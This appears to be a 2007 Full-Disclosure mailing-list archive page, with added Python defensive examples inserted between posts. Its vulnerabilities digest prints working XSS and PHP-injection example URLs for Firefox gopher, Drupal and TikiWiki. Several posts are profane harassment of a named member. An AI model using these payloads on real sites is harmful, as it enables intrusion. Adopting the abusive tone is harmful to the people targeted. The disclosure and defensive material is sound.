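        if user not in self._users:
            # Decoy salt for unknown users; no nonce is recorded for them.
            return secrets.token_bytes(16), nonce
        self._pending[user] = nonce
        return self._users[user][0], nonce

    def login(self, user, response):
        # The nonce is burned on every attempt, whether it succeeds or not.
        nonce = self._pending.pop(user, None)
        if nonce is None:
            return False
        key = self._users[user][1]
        expected = hmac.new(key, nonce, hashlib.sha256).digest()
        return hmac.compare_digest(expected, response)


def client_response(password, salt, nonce):
    """What the browser sends: HMAC over the server's nonce, never the key itself."""
    return hmac.new(derive_key(password, salt), nonce, hashlib.sha256).digest()


def replay_demo():
    """Replay one captured login message against both schemes."""
    password = "correct horse battery staple"  # constructed sample credential

    static = StaticHashLogin()
    static.register("alice", password)
    sniffed_hash = hashlib.sha1(password.encode()).hexdigest()  # value seen on the wire
    results = {"static_replay_accepted": static.login("alice", sniffed_hash)}

    cr = ChallengeResponseLogin()
    cr.register("alice", password)
    salt, nonce = cr.challenge("alice")
    sniffed_response = client_response(password, salt, nonce)  # value seen on the wire
    results["cr_first_login"] = cr.login("alice", sniffed_response)
    # Replay with no outstanding challenge: the nonce was already burned.
    results["cr_replay_no_challenge"] = cr.login("alice", sniffed_response)
    # Replay after requesting a fresh challenge: the nonce no longer matches.
    cr.challenge("alice")
    results["cr_replay_new_challenge"] = cr.login("alice", sniffed_response)
    return results


if __name__ == "__main__":
    for name, accepted in replay_demo().items():
        print(f"{name}: {accepted}")
```

The key stored by this simple challenge-response server is still a password equivalent if the user database leaks; the example only addresses the sniffed-credential replay discussed in the thread.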


Re: [Full-disclosure] Fwd: Experience masturbation like never before.

2007-10-16 Thread full-disclosure

Do you understand how email technologies work?  I would like to
point out that you don't.  I'm sure Vladis will have something to
say.  Since *clearly* you should become an hero.

Except for the hushmail part.



On Tue, 16 Oct 2007 16:13:52 -0400 Dude VanWinkle
[EMAIL PROTECTED] wrote:
Those are some pretty good faked headers guys (except for the
hushmail part)

FYI: No one will notice the difference if you spoof my addy, 'cause I
have been filtered for years!

-JP

On 10/16/07, Dude VanVinkle [EMAIL PROTECTED] wrote:
 Someone on FD works for Yambo Financials. lulz

 - JP.

 On 10/16/07, [EMAIL PROTECTED] full-[EMAIL PROTECTED] wrote:
  What is it then?
 
  On Tue, 16 Oct 2007 13:57:55 -0400 [EMAIL PROTECTED] wrote:
  On Tue, 16 Oct 2007 11:55:17 EDT, full-[EMAIL PROTECTED] said:
   Why am I getting emails like this?
  
  Obviously, the spammers have learned the secret of targeted marketing.


Re: [Full-disclosure] [MailServer Notification]Content Filtering Notification

2007-10-16 Thread full-disclosure

stop swearing in email please

On Tue, 16 Oct 2007 16:18:11 -0400 [EMAIL PROTECTED] wrote:
This email has violated the PROFANITY.
and Quarantine entire message has been taken on 16/10/2007 22.17.33.
Message details:
Server:MAIL1RELAY
Sender: [EMAIL PROTECTED];
Recipient:full-[EMAIL PROTECTED];[EMAIL PROTECTED];
Subject:Re: [Full-disclosure] password hash, funny myth in the industry!


Re: [Full-disclosure] [EMAIL PROTECTED]

2007-10-15 Thread full-disclosure

I think you're just terribly unfunny.

On Sun, 14 Oct 2007 23:20:56 -0400 Dude VanWinkle
[EMAIL PROTECTED] wrote:
On 10/14/07, [EMAIL PROTECTED] full-[EMAIL PROTECTED] wrote:
 Explain your joke Mister Vranesevich.

Nah, I give up. I was just trying to annoy you as much as you try and
annoy everyone else, but you have 100 times my annoyance factor (which
is pretty impressive), and it's a hopeless battle.

Congrats! You win the scorn of hundreds!

-JP


Re: [Full-disclosure] [EMAIL PROTECTED]

2007-10-14 Thread full-disclosure

http://gcc.gnu.org/ml/gcc-help/2006-05/msg00267.html

On Sat, 13 Oct 2007 17:44:53 -0400 worried security [EMAIL PROTECTED] wrote:
On 10/13/07, Dude VanWinkle [EMAIL PROTECTED] wrote:

 On 10/13/07, worried security [EMAIL PROTECTED] wrote:
  On 10/13/07, Richard Golodner [EMAIL PROTECTED] wrote:

   Why don't you keep this offline between you and full-disclosure? I know
  Valdis and he does not give a damn about any of this sophomoric stuff. When
  you post legitimate security information your credibility is increased as
  well as the amount of respect you receive amongst the security community.
  Take this as friendly advice and nothing more. You should not threaten to
  play games as you may not be aware of who is reading this stuff. I know NSA,
  Interpol and FBI personnel who read this but will never reveal themselves,
  but you expose yourself to possible investigation by making threats. And
  that is never a good idea.

 I don't think that The Douchebag can be charged with threatening himself...

 You do realize that some trolls register multiple accounts on the same
 mailing list so that they can have the benefit of annoying everyone
 else while only talking to themselves. This is done in order to make
 people like you think that there is a serious discussion going on.

 -JP[EMAIL PROTECTED] boyee'


And you do realise you are nothing more than an alias as well?

I have nothing to do with [EMAIL PROTECTED], gobbles or anyone else.

I clearly sign my e-mails with n3td3v if changing e-mail address.

So thanks for playing, I am a serious security person who is British, I have
nothing to do with any other alias, unless signed with the n3td3v tag,

Thanks for playing JP, and btw, what does JP stand for?


Re: [Full-disclosure] [EMAIL PROTECTED]

2007-10-14 Thread full-disclosure

Explain your joke Mister Vranesevich.

On Sun, 14 Oct 2007 20:31:16 -0400 Dude VanWinkle
[EMAIL PROTECTED] wrote:
On 10/14/07, [EMAIL PROTECTED] full-[EMAIL PROTECTED] wrote:
 http://gcc.gnu.org/ml/gcc-help/2006-05/msg00267.html


Oh yeah? two can play that game:

http://www.forbiddenweb.org/topic/10084/index.html

-JP


Re: [Full-disclosure] extension for Firefox to force HTTPS always?

2007-10-13 Thread full-disclosure

Dear 3APAPA,

In the English language, the words criticism and suggestion are not
synonyms.  If you could please kindly point out where Vladis makes
a suggestion (anywhere, anytime), or says anything constructive
(anywhere, anytime), or anything remotely clever (anywhere,
anytime) I would greatly appreciate it.

I am however impressed with your use of advanced computer hacking
tools such as host, openssl, and tcpdump in the Linux computer
hacking environment.

I feel your pain on the icmp issue as well.  Some people are just
ratfuck bastards.

Cheers!

On Fri, 12 Oct 2007 22:12:08 -0400 Harry Hoffman [EMAIL PROTECTED]
solutions.net wrote:
what is wrong with his suggestion?

If you look at the situation the following things happen:

[EMAIL PROTECTED] ~]$ host www.cnn.com
www.cnn.com has address 64.236.16.20
www.cnn.com has address 64.236.16.52
www.cnn.com has address 64.236.24.12
www.cnn.com has address 64.236.29.120
www.cnn.com has address 64.236.91.21
www.cnn.com has address 64.236.91.22
www.cnn.com has address 64.236.91.23
www.cnn.com has address 64.236.91.24
Host www.cnn.com not found: 3(NXDOMAIN)


[EMAIL PROTECTED] ~]$ openssl s_client -connect www.cnn.com:443


[EMAIL PROTECTED] ~]# tcpdump -i wlan0 -ln tcp port 443 and net '64.236'
tcpdump: verbose output suppressed, use -v or -vv for full protocol decode
listening on wlan0, link-type EN10MB (Ethernet), capture size 96 bytes
22:02:32.427607 IP 192.168.1.103.35113 > 64.236.24.12.https: S 2923208691:2923208691(0) win 5840 <mss 1460,sackOK,timestamp 102380687 0,nop,wscale 7>
22:02:35.427467 IP 192.168.1.103.35113 > 64.236.24.12.https: S 2923208691:2923208691(0) win 5840 <mss 1460,sackOK,timestamp 102383687 0,nop,wscale 7>
22:02:41.427496 IP 192.168.1.103.35113 > 64.236.24.12.https: S 2923208691:2923208691(0) win 5840 <mss 1460,sackOK,timestamp 102389687 0,nop,wscale 7>
22:02:53.427470 IP 192.168.1.103.35113 > 64.236.24.12.https: S 2923208691:2923208691(0) win 5840 <mss 1460,sackOK,timestamp 102401687 0,nop,wscale 7>
22:03:17.427469 IP 192.168.1.103.35113 > 64.236.24.12.https: S 2923208691:2923208691(0) win 5840 <mss 1460,sackOK,timestamp 102425687 0,nop,wscale 7>
22:04:05.427466 IP 192.168.1.103.35113 > 64.236.24.12.https: S 2923208691:2923208691(0) win 5840 <mss 1460,sackOK,timestamp 102473687 0,nop,wscale 7>
22:05:41.427556 IP 192.168.1.103.47627 > 64.236.29.120.https: S 2954205762:2954205762(0) win 5840 <mss 1460,sackOK,timestamp 102569687 0,nop,wscale 7>
22:05:44.427467 IP 192.168.1.103.47627 > 64.236.29.120.https: S 2954205762:2954205762(0) win 5840 <mss 1460,sackOK,timestamp 102572687 0,nop,wscale 7>
22:05:50.427472 IP 192.168.1.103.47627 > 64.236.29.120.https: S 2954205762:2954205762(0) win 5840 <mss 1460,sackOK,timestamp 102578687 0,nop,wscale 7>
22:06:02.428441 IP 192.168.1.103.47627 > 64.236.29.120.https: S 2954205762:2954205762(0) win 5840 <mss 1460,sackOK,timestamp 102590687 0,nop,wscale 7>


If there are a ton of addresses associated with the hostname record
you'd be sitting there for a long time, no?

It'd be nice if sites sent an unreachable message but some ppl still
believe that blocking all ICMP is ok...

go figure.

Cheers,
Harry


[EMAIL PROTECTED] wrote:
 MAYBE YOU HAVE A SUGGESTION OR SOMETHING CONSTRUCTIVE TO SAY AFTER
 ALL THESE YEARS VLADIS OR MAYBE YOU SHOULD SHUT THE FUCK UP!!!

 YOU AREN'T SMARTER THAN WE THINK YOU ARE

 On Fri, 12 Oct 2007 21:55:37 -0400 [EMAIL PROTECTED] wrote:
 On Fri, 12 Oct 2007 15:06:14 PDT, Kristian Erik Hermansen said:
  I just wanted to clarify that I am looking for an extension that will
  rewrite all encountered HTTP references in Firefox to HTTPS.  I would
  already have a firewall or some other layer7 filtering device blocking
  unencrypted traffic.  The addon Better Gmail does something similar
  to this, with the force HTTPS option, but not exactly...

 What should this hypothetical extension do if it automagically redirect
 http: to https:, but the target server is something that is only listening
 on port 80 because it doesn't have https: enabled?

 https://www.cnn.com just sorta sits there for me.

Re: [Full-disclosure] extension for Firefox to force HTTPS always?

2007-10-13 Thread full-disclosure

No idea you got an idea big guy?

No?  Shut the fuck up.

On Fri, 12 Oct 2007 22:45:12 -0400 [EMAIL PROTECTED] wrote:
On Sat, 13 Oct 2007 02:15:39 -, [EMAIL PROTECTED] said:

 I don't know about a browser extension, but you might be able to install
 apache with mod_ssl, mod_proxy, and mod_rewrite locally then basically have it
 take care of everything.

Same problem still - you proxy, you rewrite it to port 443 - and the destination
doesn't *have* anything at port 443. What should your Apache do?


Re: [Full-disclosure] extension for Firefox to force HTTPS always?

2007-10-13 Thread full-disclosure

*wow* you win an *award* for most *stars* used in an *email* to
demonstrate your *mental* *superiority* and the *dude* was not even
talking about pentesting he was talking about *browsing teh
interweb* at net cafes.

*you* could have asked for *clarifications* on what he was trying
to *accomplish* and instead you chose to *try* becoming a
*trendsetter* by using lots of *** in your *email* and still
managed to be *completely* offtopic *and* continue to be *useless*.
 *at least* *gobbles* wants in your pants.

http://lists.grok.org.uk/pipermail/full-disclosure/2007-October/066616.html



On Sat, 13 Oct 2007 11:14:26 -0400 [EMAIL PROTECTED] wrote:
On Sat, 13 Oct 2007 10:25:46 EDT, [EMAIL PROTECTED] said:

 No idea you got an idea big guy?

No, merely pointing out an under-specification of the problem. There's any
number of ways that it *could* be set up - the question is what the *desired*
behavior is.  Blindly rewriting everything to https: is *doable*, but results
in some ugly corner cases.  Now, Kristian's *original* request was you don't
want to leak unencrypted data.  The reasonable response is - is it OK to leak
unencrypted, *unimportant* data (such as hitting www.cnn.com to check the news
while you take a short break)?  In fact, a *clever* pen tester may in fact
*want* to have at least *some* innocuous port 80 traffic, just so they don't
stand out because they're *only* doing port 443 traffic

(And the *really* sneaky pen tester will maintain a pseudo-random stream of
hits to CNN and google and the like, and tunnel their *important* data out via
SSL to some site with a pr0n-for-pay-ish name like www.llamas-r-hot.com,
because you *expect* to see that sort of traffic distribution... ;)

So while do everything over SSL may sound like a good first cut (and in fact
*is* a good start), the overall question is what data do you want to conceal,
and from whom, exactly?

 On Fri, 12 Oct 2007 22:45:12 -0400 [EMAIL PROTECTED] wrote:
 Same problem still - you proxy, you rewrite it to port 443 - and the destination
 doesn't *have* anything at port 443. What should your Apache do?

And anybody who has been doing security for more than a week or so *knows* that
failure to deal with corner cases like but there's nothing *listening* on
port 443 is a *major* source of bugs and places to find your 0-days.
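The corner case argued over in this thread (rewrite http: to https:, but nothing answers on port 443, and the capture earlier in the thread shows each silent address costing about three minutes of SYN retries) can be handled with a bounded probe and an explicit policy. This is an added example, not code from any poster or from an existing extension; `force_https`, `https_reachable`, the timeout values and the `SimulatedNetwork` stub are assumptions for illustration.

```python
import socket
import time
from urllib.parse import urlsplit, urlunsplit


def resolve(host, port):
    """All distinct addresses behind host (every A/AAAA record)."""
    addrs = []
    for info in socket.getaddrinfo(host, port, type=socket.SOCK_STREAM):
        if info[4][0] not in addrs:
            addrs.append(info[4][0])
    return addrs


def tcp_connect(addr, port, timeout):
    """True if the TCP handshake to addr:port completes within timeout seconds."""
    try:
        with socket.create_connection((addr, port), timeout=timeout):
            return True
    except OSError:
        return False


def https_reachable(host, per_addr_timeout=2.0, total_budget=5.0,
                    resolver=resolve, connector=tcp_connect, clock=time.monotonic):
    """Probe port 443 on each address, never spending more than total_budget seconds."""
    deadline = clock() + total_budget
    try:
        addrs = resolver(host, 443)
    except OSError:
        return False
    for addr in addrs:
        remaining = deadline - clock()
        if remaining <= 0:
            break  # many dead records must not add up to minutes of waiting
        if connector(addr, 443, min(per_addr_timeout, remaining)):
            return True
    return False


def force_https(url, allow_plaintext=frozenset(), **probe):
    """Return (action, url); action is 'pass', 'upgrade', 'allow-plaintext' or 'block'."""
    parts = urlsplit(url)
    if parts.scheme != "http":
        return ("pass", url)
    host = parts.hostname
    # Only default-port URLs are upgraded; any userinfo is dropped on rewrite.
    if host and parts.port in (None, 80) and https_reachable(host, **probe):
        netloc = f"[{host}]" if ":" in host else host
        return ("upgrade",
                urlunsplit(("https", netloc, parts.path, parts.query, parts.fragment)))
    # Fail closed: plaintext is sent only to hosts the user explicitly listed.
    if host in allow_plaintext:
        return ("allow-plaintext", url)
    return ("block", url)


class SimulatedNetwork:
    """Constructed stand-in for DNS and TCP so the example runs offline."""

    def __init__(self, listening=()):
        self.now = 0.0
        self.listening = set(listening)
        self.attempts = []

    def clock(self):
        return self.now

    def resolver(self, host, port):
        # Eight constructed records, mirroring the multi-address host in the thread.
        return [f"192.0.2.{i}" for i in range(1, 9)]

    def connector(self, addr, port, timeout):
        self.attempts.append((addr, timeout))
        if addr in self.listening:
            return True
        self.now += timeout  # a silently dropped SYN costs the whole timeout
        return False

    def probe(self):
        return {"resolver": self.resolver, "connector": self.connector,
                "clock": self.clock}


if __name__ == "__main__":
    dead = SimulatedNetwork()
    print(force_https("http://www.example.test/news?id=1", **dead.probe()))
    print("attempts:", dead.attempts, "simulated seconds:", dead.now)
    live = SimulatedNetwork(listening={"192.0.2.2"})
    print(force_https("http://www.example.test/news?id=1", **live.probe()))
```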


Re: [Full-disclosure] [EMAIL PROTECTED]

2007-10-13 Thread full-disclosure

*what* *has* *vladis* *ever* *done* *other* *than* *reply* *with*
*smug*  *offtopic* *responses* *proving* *his* *incompetence*?

*i* *have* *reported* *your* *irc* *channel* *to* *cert* *and*
*your* *email* *address* *to* *the *intelligence* *agencies*
*gobbles*.  *do* *you* *think* *they* *will* *knock* *or* *just*
*kick* *in* *your* *door* *or* *just* *breach* *your* *tin* *foil*
*hat* *and* *steal* *your* *brainwaves*?*

**SHUT*THE*FUCK*UP*VLADIS**

On Sat, 13 Oct 2007 11:01:08 -0400 worried security
[EMAIL PROTECTED] wrote:
will the user with the e-mail address [EMAIL PROTECTED] please
shut the fuck up.

valdis is a respected member of the security community, he is a senior
member, so will you shut up? i consider him a friend, he has never attacked
you, so why are you attacking him?

if you want to attack someone, attack gadi evron or robert lemos or some
other random who deserve to be attacked.

thank you man, and i know you're an ok guy, but  LEAVE VALDIS ALONE!!!

and don't attack me or i'll attack you understand?

http://n3td3v.googlepages.com


Re: [Full-disclosure] [EMAIL PROTECTED]

2007-10-13 Thread full-disclosure

*no* *you*

On Sat, 13 Oct 2007 14:14:28 -0400 worried security
[EMAIL PROTECTED] wrote:
On 10/13/07, [EMAIL PROTECTED] full-[EMAIL PROTECTED] wrote:

 *what* *has* *vladis* *ever* *done* *other* *than* *reply* *with*
 *smug*  *offtopic* *responses* *proving* *his* *incompetence*?

 *i* *have* *reported* *your* *irc* *channel* *to* *cert* *and*
 *your* *email* *address* *to* *the *intelligence* *agencies*
 *gobbles*.  *do* *you* *think* *they* *will* *knock* *or* *just*
 *kick* *in* *your* *door* *or* *just* *breach* *your* *tin* *foil*
 *hat* *and* *steal* *your* *brainwaves*?*

 **SHUT*THE*FUCK*UP*VLADIS**


gobbles have nothing to do with n3td3v seems like your *intelligence* is
wrong.


Re: [Full-disclosure] Tikiwiki 1.9.8 exploit ITW

2007-10-12 Thread full-disclosure

SHUT UP VLADIS THE PIG

On Fri, 12 Oct 2007 06:23:02 -0400 3APA3A [EMAIL PROTECTED] wrote:
Dear Moritz Naumann,

This vulnerability was found by ShAnKaR

http://securityvulns.ru/Sdocument162.html

and reported on Bugtraq yesterday (see Vulnerabilities digest
message). TikiWiki developers were informed on October, 8.

--Friday, October 12, 2007, 1:20:06 AM, you wrote to full-[EMAIL PROTECTED]:


MN Disabling url_fopen() or denying access to tiki-graph_formula.php for
MN unauthenticated users will prevent your site from being exploited.

MN I've notified the developers.

MN If, what it says on http://dev.tikiwiki.org/Security is up to date (i.e.
MN unfixed security issues of high priority initially reported 9 months
MN ago), then you really should not use this software.

--
~/ZARAZA http://securityvulns.com/
Man is a mystery... I occupy myself with this mystery in order to be human.
(Dostoevsky)


[Full-disclosure] REALLY GOOD ARTICLE FROM SECURITYFOCUS

2007-10-12 Thread full-disclosure

THIS IS A REALLY GOOD ARTICLE FROM SECURITYFOCUS.

http://www.securityfocus.com/columnists/454




Re: [Full-disclosure] extension for Firefox to force HTTPS always?

2007-10-12 Thread full-disclosure

MAYBE YOU HAVE A SUGGESTION OR SOMETHING CONSTRUCTIVE TO SAY AFTER
ALL THESE YEARS VLADIS OR MAYBE YOU SHOULD SHUT THE FUCK UP!!!

YOU AREN'T SMARTER THAN WE THINK YOU ARE

On Fri, 12 Oct 2007 21:55:37 -0400 [EMAIL PROTECTED] wrote:
On Fri, 12 Oct 2007 15:06:14 PDT, Kristian Erik Hermansen said:
 I just wanted to clarify that I am looking for an extension that will
 rewrite all encountered HTTP references in Firefox to HTTPS.  I would
 already have a firewall or some other layer7 filtering device blocking
 unencrypted traffic.  The addon Better Gmail does something similar
 to this, with the force HTTPS option, but not exactly...

What should this hypothetical extension do if it automagically redirect
http: to https:, but the target server is something that is only listening
on port 80 because it doesn't have https: enabled?

https://www.cnn.com just sorta sits there for me.


Re: [Full-disclosure] Email Disclaimers...Legally Liable if breached?

2007-10-11 Thread full-disclosure
VLADIS YOU ARE NOT LAWYER!  YOU DO NOT EVEN KNOW HOW TO USE
COMPUTER!

SHUT UP VLADIS!

On Thu, 11 Oct 2007 13:56:36 -0400 [EMAIL PROTECTED] wrote:
On Wed, 10 Oct 2007 22:44:08 PDT, Troy said:

 I'm surprised we don't see more disclaimers with a copyright statement in
 them. I would think that using copyright law as an argument against
 unauthorized distribution of an email would stand a better chance in court
 than a non-binding disclaimer at the bottom of the message.

The problem is that it's *really* hard to write the disclaimer with a copyright
attached to it.  The tricky part is to figure out how to make it *legal* to
cite the text in a reply - how would you phrase your copyright statement to
allow what I'm doing in this message?

Also, copyright doesn't cover *ideas* well - so if the leaked e-mail has info
about (for instance) a planned hostile corporate takeover, the *information*
has escaped, and copyright only prohibits *that expression* from being copied.
If I rephrase and restate the info, there's no copyright issue with my then
telling all and sundry about the corporation that's about to have a hostile
takeover...


Re: [Full-disclosure] Remote Desktop Command Fixation Attacks

2007-10-11 Thread full-disclosure
SHUT UP VLADIS

On Thu, 11 Oct 2007 14:54:52 -0400 [EMAIL PROTECTED] wrote:
On Wed, 10 Oct 2007 14:05:28 EDT, [EMAIL PROTECTED] said:

 SHUT UP VLADIS IF ANYONE CARED THEY WOULD JUST FREQUENT YOUR BLOG
 GET OFF THIS LIST THIS IS FOR SERIOUS SECURITY MATTERS ONLY

You seem a tad confused regarding the use of the reply button, since:

 On Wed, 10 Oct 2007 07:14:32 -0400 pdp (architect)
 [EMAIL PROTECTED] wrote:

I wasn't the one who you were replying to.


Re: [Full-disclosure] If internet goes down out of hours, we're screwed

2007-10-10 Thread full-disclosure
SHUT UP VLADIS

On Tue, 09 Oct 2007 23:08:16 -0400 Dude VanWinkle
[EMAIL PROTECTED] wrote:
On 10/9/07, [EMAIL PROTECTED] full-
[EMAIL PROTECTED] wrote:
 -BEGIN PGP SIGNED MESSAGE-
 Hash: SHA1

 You also missed an apostrophe in this post.

 On Tue, 09 Oct 2007 22:06:47 -0400 Dude VanWinkle
 [EMAIL PROTECTED] wrote:
 to worried security [EMAIL PROTECTED]

Man, netdev, you are really outing the fact that you use several
accounts to reply to yourself. Are you slippin'? --note the apostrophe

-JP


Re: [Full-disclosure] Core Impact 7.5 Web App pen-testing framework, as good as the hype?

2007-10-10 Thread full-disclosure
YES

On Tue, 09 Oct 2007 23:10:07 -0400 Dude VanWinkle
[EMAIL PROTECTED] wrote:
On 10/9/07, [EMAIL PROTECTED] full-
[EMAIL PROTECTED] wrote:
 -BEGIN PGP SIGNED MESSAGE-ww.hushtools.com/verify
 Charset: UTF8
 Version: Hush 2.5


So iz yer new [EMAIL PROTECTED] handl3 UTF8 or Hush 2.5?

-JPthe easily confused


Re: [Full-disclosure] 0day: Hacking secured CITRIX from outside

2007-10-10 Thread full-disclosure

SHUT UP VLADIS

On Wed, 10 Oct 2007 11:47:23 -0400 pdp (architect)
[EMAIL PROTECTED] wrote:
http://www.gnucitizen.org/blog/0day-hacking-secured-citrix-from-outside

In the true spirit of GNUCITIZEN half(partial)-disclosure initiative,
we announce that it is possible to gain user access level on
integrated remote CITRIX servers. The bug/feature does not rely on
any client/server vulnerabilities nor client/server misconfiguration
issues. All an attacker needs to do to exploit the weakness is to lure
a victim, part of an integrated network, to a malicious website or
trick them into opening specially crafted ICA files. The attack
results in remote command execution with the access level of the
current user.

The success of the attack relies on the fact that the victim (the
proxy) is part of a CITRIX ring to which he/she can perform pass
through authentication. Once a connection is instantiated, the victim
will unwillingly and transparently login into CITRIX and perform
several commands specified by the attacker. The attacker can simply
instruct the remote desktop to download files from a remote TFTP
server and execute them locally. Once the attack is performed, the
local connection is terminated and the CITRIX session is cleared. No
user interaction is required!

CAUTION!!! The attack can be used to circumvent/bypass border
firewalls and sneak into private networks. This attack is of type CSRF
(Cross-site Request forgery), although it does not rely on Web bugs.
The attack vector works flawlessly on IE and Firefox (when configured
correctly). It also works with any email client or other types of file
sharing mechanisms. All versions of CITRIX and CITRIX client are
affected. The attack may fail on certain setups.

If you manage to re-discover the type of vulnerability outlined in
this post, we encourage you to keep it private. Give some time for the
folks at CITRIX to react. Currently, I am not aware of any remedy
against the attack. Given CITRIX's popularity among corporations and
big organizations, it is highly recommended to take this warning with
extra caution.

--
pdp (architect) | petko d. petkov
http://www.gnucitizen.org



Re: [Full-disclosure] Remote Desktop Command Fixation Attacks

2007-10-10 Thread full-disclosure

SHUT UP VLADIS IF ANYONE CARED THEY WOULD JUST FREQUENT YOUR BLOG
GET OFF THIS LIST THIS IS FOR SERIOUS SECURITY MATTERS ONLY

On Wed, 10 Oct 2007 07:14:32 -0400 pdp (architect)
[EMAIL PROTECTED] wrote:
http://www.gnucitizen.org/blog/remote-desktop-command-fixation-attacks

Security in depth does not exist! No matter what you do, dedicated
attackers will always be able to penetrate your network. Seriously!
Information security is mostly about risk assessment and crisis
management.

When it comes to exploitative penetration testing, I rely on tactics
rather than exploits. I've already talked about how insecure Remote
Desktop service could be. In this post I will show you how easy it is
to compromise a well protected Windows Terminal or CITRIX server with
a simple social engineering attack and some knowledge about the
platform we are about to exploit.

The attack is rather simple. All the bad guys have to do is to compose
a malicious RDP (for Windows Terminal Services) or ICA (for CITRIX)
file and send it to the victim. The victim is persuaded to open the
file by double clicking on it. When the connection is established, the
user will enter their credentials to login and as such let the hackers
in. Vicious!

I have a more detailed explanation about the tactics behind this
attack. Because I don't want to spam people with tons of text, I just
included a link which you can follow. Hope that this is useful and at
the same time eye opening, not that it is something completely
amazing. But it does work and it works well.

cheers.

--
pdp (architect) | petko d. petkov
http://www.gnucitizen.org

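A check that a mail gateway or help desk could run on .rdp and .ica attachments before anyone opens them, covering the attack described in this post and in the CITRIX announcement quoted in the previous message. It is an added example, not code from either post: the key names are assumed from the documented .rdp/.ica file formats, and the function names, hostnames and sample files are constructed.

```python
import re

# Settings that make the session start a preset program. The key names are an
# assumption drawn from the documented .rdp/.ica formats, not from the posts.
RDP_EXEC_KEYS = {"alternate shell", "remoteapplicationprogram",
                 "remoteapplicationcmdline"}
ICA_EXEC_KEYS = {"initialprogram", "longcommandline"}

RDP_LINE = re.compile(r"^\s*([^:=]+):([isb]):(.*)$", re.I)  # name:type:value
ICA_LINE = re.compile(r"^\s*([A-Za-z][\w ]*?)\s*=(.*)$")    # Name=Value


def decode_file(data: bytes) -> str:
    """.rdp files are often saved as UTF-16 with a BOM; otherwise assume UTF-8."""
    if data[:2] in (b"\xff\xfe", b"\xfe\xff"):
        return data.decode("utf-16")
    return data.decode("utf-8-sig", errors="replace")


def audit(data: bytes) -> dict:
    """Report the target host and every setting that presets a command."""
    report = {"target": None, "preset_commands": []}
    for line in decode_file(data).splitlines():
        rdp, ica = RDP_LINE.match(line), ICA_LINE.match(line)
        if rdp:
            key, value, exec_keys, target_key = (
                rdp.group(1), rdp.group(3), RDP_EXEC_KEYS, "full address")
        elif ica:
            key, value, exec_keys, target_key = (
                ica.group(1), ica.group(2), ICA_EXEC_KEYS, "address")
        else:
            continue  # section header, comment or blank line
        key, value = key.strip().lower(), value.strip()
        if key == target_key:
            report["target"] = value
        elif key in exec_keys and value:
            report["preset_commands"].append((key, value))
    return report


def should_quarantine(data: bytes, allowed_hosts: set) -> bool:
    """Quarantine when a command is preset or the target is not an approved host."""
    report = audit(data)
    host = (report["target"] or "").rsplit(":", 1)[0].lower()
    return bool(report["preset_commands"]) or host not in allowed_hosts


# Constructed samples (not taken from the posts); the preset program is benign.
RDP_PRESET = ("full address:s:ts01.corp.example\r\n"
              "alternate shell:s:notepad.exe\r\n").encode("utf-16")
ICA_PRESET = (b"[WFClient]\r\nVersion=2\r\n[Desktop]\r\n"
              b"Address=ctx01.corp.example\r\nInitialProgram=notepad.exe\r\n")
RDP_PLAIN = b"full address:s:ts01.corp.example:3389\r\nscreen mode id:i:2\r\n"

if __name__ == "__main__":
    for name, blob in [("preset.rdp", RDP_PRESET), ("preset.ica", ICA_PRESET),
                       ("plain.rdp", RDP_PLAIN)]:
        print(name, audit(blob), should_quarantine(blob, {"ts01.corp.example"}))
```

A file that names an approved host and presets no program passes; anything else is held for review.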


Re: [Full-disclosure] Vulnerabilities digest

2007-10-10 Thread full-disclosure
 before 2.0:

gopher:///1+ADw-SCRIPT+AD4-alert('XSS')+ADw-/SCRIPT+AD4-

gopher:///1Turn%20on%20UTF-7%20to%20view%20this%20message%20+ADw-SCRIPT+AD4-alert('XSS')+ADw-/SCRIPT+AD4-

For Firefox 2.0:

gopher:///1+ADw-SCRIPT+AD4-alert(/XSS/)+ADw-/SCRIPT+AD4-

gopher:///1Turn%20on%20UTF-7%20to%20view%20this%20message%20+ADw-SCRIPT+AD4-alert(/XSS/)+ADw-/SCRIPT+AD4-

According to author, it's possible to execute script in both local zone
and context of gopher site.

12. ShAnKaR reports PHP Zend Hash vulnerability exploitation vector
with Drupal = 5.2.

Example:
http://www.example.com/drupal/?_menu[callbacks][1][callback]=drupal
_eval_menu[items][][type]=-1-312030023=1q=1/?phpinfo();

Original message (in Russian):
http://securityvulns.ru/Sdocument137.html

13. ShAnKaR reports PHP injection vulnerability in TikiWiki 1.9.8.

Example: http://www.example.com/tikiwiki/tiki-
graph_formula.php?w=1h=1s=1min=1max=2f[]=x.tan.phpinfo()t=png
title=

Original message (in Russian):

http://securityvulns.ru/Sdocument162.html

Also, multiple vulnerabilities were reported in English by

:: iNs @ uNkn0wn.eu :: http://securityvulns.com/source26994.html
and
r0t: http://securityvulns.com/source12948.html

--
http://securityvulns.com/
 /\_/\
{ , . } |\
+--oQQo-{ ^ }-+ \
|  ZARAZA  U  3APA3A   } You know my name - look up my number (The Beatles)
+-o66o--+ /
|/

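The gopher payloads in the digest above hide `<SCRIPT>` as UTF-7 shift sequences (`+ADw-`, `+AD4-`), so a filter that only looks for a literal `<` never sees it. This added example (not from the digest or its authors; the function names are hypothetical) decodes a value the way a UTF-7-aware client would and flags markup that appears only after decoding.

```python
import base64
import re
from urllib.parse import unquote

# A UTF-7 shift sequence: '+', a run of base64 characters, optional closing '-'.
SHIFT_RUN = re.compile(r"\+([A-Za-z0-9+/]*)-?")
MARKUP = re.compile(r"<\s*/?\s*[a-z!]", re.I)   # start of an HTML tag or comment


def _decode_run(match):
    b64 = match.group(1)
    if not b64:                      # "+-" is UTF-7 for a literal plus sign
        return "+"
    try:
        raw = base64.b64decode(b64 + "=" * (-len(b64) % 4))
        # The run carries UTF-16BE code units; drop a trailing partial unit.
        return raw[: len(raw) // 2 * 2].decode("utf-16-be")
    except ValueError:               # not valid base64 or UTF-16: leave untouched
        return match.group(0)


def utf7_view(value: str) -> str:
    """What the value becomes if a client interprets it as UTF-7."""
    return SHIFT_RUN.sub(_decode_run, unquote(value))


def hides_markup(value: str) -> bool:
    """True when no tag is visible in the plain reading of the value but one
    appears once it is read as UTF-7, i.e. it would pass a literal '<' filter."""
    plain = unquote(value)
    return not MARKUP.search(plain) and bool(MARKUP.search(utf7_view(value)))


# The first two samples are the strings quoted in the digest; the rest are
# constructed to show the percent-encoded form and two benign uses of '+'.
SAMPLES = [
    "gopher:///1+ADw-SCRIPT+AD4-alert('XSS')+ADw-/SCRIPT+AD4-",
    "gopher:///1Turn%20on%20UTF-7%20to%20view%20this%20message%20"
    "+ADw-SCRIPT+AD4-alert(/XSS/)+ADw-/SCRIPT+AD4-",
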